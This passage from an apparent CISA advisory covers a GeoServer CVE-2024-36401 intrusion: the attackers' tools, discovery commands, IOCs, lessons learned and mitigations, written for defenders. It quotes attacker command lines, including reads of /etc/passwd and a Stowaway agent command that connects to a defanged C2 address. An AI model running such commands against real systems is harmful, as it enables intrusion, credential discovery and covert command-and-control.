<p>The cyber threat actors identified <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [<a href="https://attack.mitre.org/versions/v17/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a>]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.</p>
<h3>Resource Development</h3>
<p>The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [<a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a>].</p>
<h3>Initial Access</h3>
<p>To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE 2024-36401">CVE 2024-36401</a> [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the <code>.js</code> file returning <code>404</code> responses in the web logs, indicating that the server could not find the requested URL.</p>
<h3>Persistence</h3>
<p>The cyber threat actors primarily used web shells [<a href="https://attack.mitre.org/versions/v17/techniques/T1505/003/" target="_blank" title="T1505.003">T1505.003</a>] on internet-facing hosts, along with <code>cron</code> jobs (scheduled commands that run automatically at specified times) [<a href="https://attack.mitre.org/versions/v17/techniques/T1053/003/" target="_blank" title="T1053.003">T1053.003</a>], and valid accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.</p>
<h3>Privilege Escalation</h3>
<p>The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool <a href="https://www.cisa.gov/#dirtycow" title="Footnote Reference 2"><sup>[2]</sup></a>, which can be used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2016-5195" target="_blank" title="CVE-2016-5195">CVE-2016-5195</a> [<a href="https://cwe.mitre.org/data/definitions/362.html" target="_blank" title="CWE-362: Race Condition">CWE-362: “Race Condition”</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a>]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).</p>
<p><strong>Note: </strong><a href="https://www.cve.org/CVERecord?id=CVE-2016-5195" target="_blank" title="CVE-2016-5195">CVE-2016-5195</a> affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.</p>
<h3>Defense Evasion</h3>
<p>To evade detection, the cyber threat actors employed indirect command execution via <code>.php</code> web shells and <code>xp_cmdshell</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1202/" target="_blank" title="T1202">T1202</a>] and abused Background Intelligence Transfer Service (BITS) jobs [<a href="https://attack.mitre.org/versions/v17/techniques/T1197/" target="_blank" title="T1197">T1197</a>]. CISA also observed files on GeoServer 1 named <code>RinqQ.exe</code> and <code>RingQ.rar</code>, which likely refer to a publicly available defense evasion tool called RingQ <a href="https://www.cisa.gov/#RingQ" title="Footnote Reference 3"><sup>[3]</sup></a>, that the cyber threat actors staged for potential use.</p>
<p><strong>Note: </strong>CISA could not recover most of the files on the host to confirm their contents.</p>
<h3>Credential Access</h3>
<p>Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110">T1110</a>] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.</p>
<h3>Discovery</h3>
<p>After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [<a href="https://attack.mitre.org/versions/v17/techniques/T1018/" target="_blank" title="T1018">T1018</a>] and downloaded the <code>fscan</code> tool <a href="https://www.cisa.gov/#fscan" title="Footnote Reference 4"><sup>[4]</sup></a> to scan the organization’s network. CISA identified the use of the <code>fscan</code> tool by analyzing evidence of its output found on disk. (<strong>Note: </strong><code>fscan</code> is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using <code>fscan</code> and <code>linux-exploit-suggester2.pl.</code> CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.</p>
<h4><strong>GeoServer 1</strong></h4>
<p>The cyber threat actors leveraged <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> to execute the following host discovery commands on GeoServer 1:</p>
<ul>
<li>uname-a</li>
<li>df-h</li>
<li>env</li>
<li>ps -aux</li>
<li>ipconfig [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>]</li>
<li>date</li>
<li>who -b</li>
<li>rpm -qa polkit</li>
<li>netstat -ano [<a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a>]</li>
</ul>
<p>Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1:</p>
<ul>
<li>cat /etc/passwd [<a href="https://attack.mitre.org/versions/v17/techniques/T1087/001/" target="_blank" title="T1087.001">T1087.001</a>]</li>
<li>cat /etc/resolv.conf</li>
<li>cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml</li>
<li>cat /etc/redhat-release [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a>]</li>
<li>cat /etc/os-release </li>
</ul>
<p>The cyber threat actors then used <code>curl</code> commands to download a shell script named <code>mm.sh</code> (which they renamed to <code>aa.sh</code>) and a zip file named <code>aaa.zip</code> to the <code>/tmp/</code> directory.</p>
<p>Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [<a href="https://attack.mitre.org/versions/v17/techniques/T1046/" target="_blank" title="T1046">T1046</a>] by using the <code>fscan</code> tool. (<strong>Note:</strong> CISA observed endpoint logs that showed the cyber threat actors uploaded <code>fscan</code> to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.</p>
<p>The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using <code>fscan</code>. Their use of the <code>-nobr</code> and <code>-nopoc</code> flags for <code>fscan</code> indicated that this scan excluded brute forcing or vulnerability scanning, respectively.</p>
<h4><strong>SQL Server</strong></h4>
<p>CISA observed the following discovery commands on the organization’s SQL server:</p>
<ul>
<li>whoami [<a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank" title="T1033">T1033</a>]</li>
<li>ipconfig /all</li>
<li>ping -n 1 8.8.8.8</li>
<li>systeminfo</li>
<li>tasklist [<a href="https://attack.mitre.org/versions/v17/techniques/T1057/" target="_blank" title="T1057">T1057</a>]</li>
<li>dir c:\ [<a href="https://attack.mitre.org/versions/v17/techniques/T1083/" target="_blank" title="T1083">T1083</a>]</li>
<li>dir c:\Users</li>
<li>type c:\Last.txt</li>
<li>type c:\inetpub\wwwroot</li>
<li>type c:\inetpub\</li>
<li>dir c:\inetpub\wwwroot</li>
<li>dir c:\</li>
<li>dir c:\ifwapps</li>
<li>dir d:\</li>
<li>dir e:\</li>
<li>net group "domain admins" /domain</li>
<li>type C:\Windows\System32\inetsrv\config\applicationHost.config</li>
<li>dir c:\ifwapps\Tier1Utilities</li>
<li>netstat -ano</li>
<li>curl</li>
<li>net user</li>
<li>tasklist</li>
</ul>
<h4><strong>GeoServer 2</strong></h4>
<p>Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.</p>
<h3>Lateral Movement</h3>
<p>In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling <code>xp_cmdshell</code> for RCE on GeoServer 1.</p>
<h3>Command and Control</h3>
<p>The cyber threat actors used PowerShell [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a>] and <code>bitsadmin getfile</code> to download payloads [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a>]. </p>
<p>They used Stowaway <a href="https://www.cisa.gov/#Stowaway" title="Footnote Reference 5">[5]</a>, a publicly available multi-level proxy tool, to establish C2 [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a>]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a <code>tomcat</code> service account.</p>
<p>The actors then executed Stowaway via <code>/var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10</code>.</p>
<p>To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a <code>curl</code> command, successfully establishing an outbound connection with their C2 server using <code>HTTP</code> over <code>TCP/4441</code>.</p>
<p>On July 14, 2024, the cyber threat actors executed <code>/tmp/mm.sh</code> on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over <code>TCP/50012</code>, likely serving as a backup C2 channel.</p>
<p>CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:</p>
<ul>
<li>RingQ antivirus defense evasion tool (<code>RingQ.exe</code>, <code>RingQ.rar</code>)</li>
<li>IOX proxy tool (<code>iox.rar</code>)</li>
<li>BusyBox trojan multi-tool (<code>busybox</code>)</li>
<li>WinRAR archive tool (<code>Rar.exe</code>)</li>
<li>Stowaway proxy tool (<code>agent</code>, <code>agent.tar</code>, <code>agent.zip</code>, <code>agentu.exe</code>)</li>
<li>Web shells (<code>Handx.ashx</code>, <code>start_tomcat.jsp</code>)</li>
<li>Various shell scripts (<code>mm.sh</code>, <code>t.py</code>, <code>t1.sh</code>, <code>c.bat</code>)</li>
</ul>
<h3>Detection</h3>
<p>The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a <code>1.txt</code> file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred <code>1.txt</code> to the SQL Server through <code>bitsadmin</code> after attempting other LOTL techniques, such as leveraging PowerShell and <code>certutil</code>. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1.</p>
<h2><a class="ck-anchor"><strong>Lessons Learned</strong></a></h2>
<p>CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities.</p>
<ol>
<li><strong>Vulnerabilities were not promptly remediated</strong>.
<ol>
<li>The cyber threat actors exploited <a href="https://www.cve.org/CVERecord?id=CVE-2024-36401" target="_blank" title="CVE-2024-36401">CVE-2024-36401</a> for initial access on two GeoServers.</li>
<li>The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024.</li>
<li>The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2.
<ol>
<li><strong>Note:</strong> FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under <a href="https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01" title="Binding Operational Directive (BOD) 22-01">Binding Operational Directive (BOD) 22-01</a>. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan.</li>
</ol>
</li>
</ol>
</li>
<li><strong>The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources</strong>.
<ol>
<li>On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion.
<ol>
<li>After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment.</li>
<li>Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently.
<ol>
<li>The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis.</li>
<li>The agency had to go through their change control board process before CISA could deploy their EDR agents.</li>
<li>The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><strong>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection</strong>.
<ol>
<li>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool.</li>
<li>The Web Server lacked endpoint protection.</li>
</ol>
</li>
</ol>
<h2><strong>Indicators of Compromise</strong></h2>
<p>See <a href="https://www.cisa.gov/#Table%C2%A01.%20IOCs" title="Table 1. IOCs"><strong>Table 1</strong></a> for IOCs associated with this activity.</p>
<p><strong>Disclaimer:</strong> The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.</p>
<p><a class="ck-anchor">Table 1. IOCs</a></p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">IOC</th>
<th role="columnheader">Type</th>
<th role="columnheader">Date</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>45.32.22[.]62</td>
<td>IPv4</td>
<td>Mid-July to early August 2024</td>
<td>C2 Server IP Address</td>
</tr>
<tr>
<td>45.17.43[.]250</td>
<td>IPv4</td>
<td>Mid-July to early August 2024</td>
<td>C2 Server IP Address</td>
</tr>
<tr>
<td>0777EA1D01DAD6DC261A6B602205E2C8</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>China Chopper Web Shell</td>
</tr>
<tr>
<td>feda15d3509b210cb05eacc22485a78c</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Generic PHP Web Shell</td>
</tr>
<tr>
<td>C9F4C41C195B25675BFA860EB9B45945</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Linux Exploit CVE-2016-5195</td>
</tr>
<tr>
<td>B7B3647E06F23B9E83D0B1CCE3E71642</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Dirtycow</td>
</tr>
<tr>
<td>64e3a3458b3286caaac821c343d4b208</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Stowaway Proxy Tool</td>
</tr>
<tr>
<td>20b70dac937377b6d0699a44721acd80</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Unknown Downloaded Executable</td>
</tr>
<tr>
<td>de778443619f37e2224898a9a800fa78</td>
<td>MD5</td>
<td>Mid-July to early August 2024</td>
<td>Unknown Downloaded Executable</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <a href="https://www.cisa.gov/#Table%C2%A02.%20Reconnaissance" title="Table 2. Reconnaissance"><strong>Table 2</strong></a> through <a href="https://www.cisa.gov/#Table%C2%A011.%20Command%20and%20Control" title="Table 11. Command and Control"><strong>Table 11</strong></a> for all referenced threat actor tactics and techniques.</p>
<p><a class="ck-anchor">Table 2. Reconnaissance</a></p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Active Scanning: Vulnerability Scanning</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a></td>
<td>The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.</td>
</tr>
</tbody>
</table>
</div>
<p><a class="ck-anchor">Table 3. Resource Development</a></p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Server</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a></td>
<td>The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS).</td>
</tr>
</tbody>
</table>
</div>
<p>Table 4. Initial Access</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a></td>
<td>The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 5. Execution</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a></td>
<td>The cyber threat actors used PowerShell to download a payload.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 6. Defense Evasion</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Indirect Command Execution</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1202/" target="_blank" title="T1202">T1202</a></td>
<td>The cyber threat actors employed indirect command execution via web shells.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 7. Persistence</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>BITS Jobs</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1197/" target="_blank" title="T1197">T1197</a></td>
<td>The cyber threat actors abused BITS jobs.</td>
</tr>
<tr>
<td>Scheduled Task/Job: Cron</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1053/003/" target="_blank" title="T1053.003">T1053.003</a></td>
<td>The cyber threat actors established persistence through <code>cron</code> jobs.</td>
</tr>
<tr>
<td>Server Software Component: Web Shell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1505/003/" target="_blank" title="T1505.003">T1505.003</a></td>
<td>The cyber threat actors uploaded web shells for persistence.</td>
</tr>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a></td>
<td>The cyber threat actors used valid accounts for persistence.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 8. Privilege Escalation</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation for Privilege Escalation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1068/" target="_blank" title="T1068">T1068</a></td>
<td>The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 9. Credential Access </p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Brute Force</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110">T1110</a></td>
<td>The cyber threat actors used brute force techniques to obtain login credentials for web services.</td>
</tr>
</tbody>
</table>
</div>
<p>Table 10. Discovery</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Account Discovery: Local Account</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1087/001/" target="_blank" title="T1087.001">T1087.001</a></td>
<td>The cyber threat actors used <code>cat /etc/passwd</code> to discover local users.</td>
</tr>
<tr>
<td>File and Directory Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1083/" target="_blank" title="T1083">T1083</a></td>
<td>The cyber threat actors used <code>dir c:\</code>, <code>dir d:\</code>, <code>dir e:\</code>, and <code>type c:\</code> commands to identify files and directories on the SQL server. </td>
</tr>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1046/" target="_blank" title="T1046">T1046</a></td>
<td>The cyber threat actors used <code>fscan</code> to identify SSH listeners and FTP servers.</td>
</tr>
<tr>
<td>Process Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1057/" target="_blank" title="T1057">T1057</a></td>
<td>The cyber threat actors used <code>tasklist</code> on the SQL server.</td>
</tr>
<tr>
<td>Remote System Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1018/" target="_blank" title="T1018">T1018</a></td>
<td>The cyber threat actors performed ping sweeps of hosts within specific subnets.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank" title="T1082">T1082</a></td>
<td>The cyber threat actors used cat <code>/etc/redhat-release</code> and <code>cat /etc/os-release</code> commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>The cyber threat actors used <code>ipconfig</code> to check GeoServer 1’s and the SQL server’s network configurations.</td>
</tr>
<tr>
<td>System Network Connections Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a></td>
<td>The cyber threat actors executed commands such as <code>netstat</code> to obtain a listing of network connections to or from the systems they compromised.</td>
</tr>
<tr>
<td>System Owner/User Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank" title="T1033">T1033</a></td>
<td>The cyber threat actors used <code>whoami</code> on the SQL server.</td>
</tr>
</tbody>
</table>
</div>
<p><a class="ck-anchor">Table 11. Command and Control</a></p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title </th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank" title="T1105">T1105</a></td>
<td>The cyber threat actors used PowerShell and <code>bitsadmin getfile</code> to download payloads.</td>
</tr>
<tr>
<td>Proxy</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/" target="_blank" title="T1090">T1090</a></td>
<td>The cyber threat actors used a connection proxy to direct traffic from their C2 server.</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor"><strong>Mitigations</strong></a></h2>
<p>CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.</strong>
<ul>
<li>Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
<ul>
<li>CISA urges organizations to address KEV catalog vulnerabilities <em>immediately</em>.</li>
</ul>
</li>
<li>Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.</li>
<li>Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
<ul>
<li>Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).</li>
<li>Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.</li>
</ul>
</li>
<li>Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.</li>
</ul>
</li>
<li><strong>Maintain, practice, and update cybersecurity IRPs </strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentResponseIRPlans2S" title="CPG 2.S">CPG 2.S</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentPlanningandPreparedness5A" title="5.A">5.A</a>].
<ul>
<li>Prepare a written IRP policy and IRP with senior leadership support.
<ul>
<li>The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.</li>
<li>The IRP should identify:
<ul>
<li>Key personnel with knowledge of the network</li>
<li>Key resources and courses of action (COAs) for containment and eradication in the event of compromise.</li>
<li>Procedures for granting third parties prompt access to networks and security tools.
<ul>
<li>This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).</li>
</ul>
</li>
</ul>
</li>
<li>The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).</li>
<li>Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
<ul>
<li>During the test, include engagement with third party incident responders and external EDR agents and other tools.</li>
<li>Following the test, update the IRP as necessary.</li>
<li>See CISA’s <a href="https://www.cisa.gov/resources-tools/services/cisa-tabletop-exercise-packages" title="Tabletop Exercise Packages">Tabletop Exercise Packages</a> for resources designed to assist organizations with conducting their own exercises.</li>
</ul>
</li>
<li>For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) <a href="https://csrc.nist.gov/pubs/sp/800/61/r3/final" target="_blank" title="SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile">SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile</a>.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs</strong> in an out-of-band, centralized location.
<ul>
<li>Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.</li>
<li>Consider using a SIEM solution for log aggregation and management.</li>
<li>Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
<ul>
<li>Abnormal activity to look for includes:
<ul>
<li>Running scans to discover other network connected devices.</li>
<li>Running commands to list, add, or alter administrator accounts.</li>
<li>Using PowerShell to download and execute remote programs.</li>
<li>Running scripts not usually seen on a network.</li>
</ul>
</li>
<li>For additional information, see joint guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land Techniques">Identifying and Mitigating Living off the Land Techniques</a>, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:</p>
<ul>
<li><strong>Require </strong><a href="https://www.cisa.gov/sites/default/files/2023-01/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA"><strong>phishing-resistant MFA</strong></a><strong> </strong>for access to all privileged accounts and email services accounts [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>].</li>
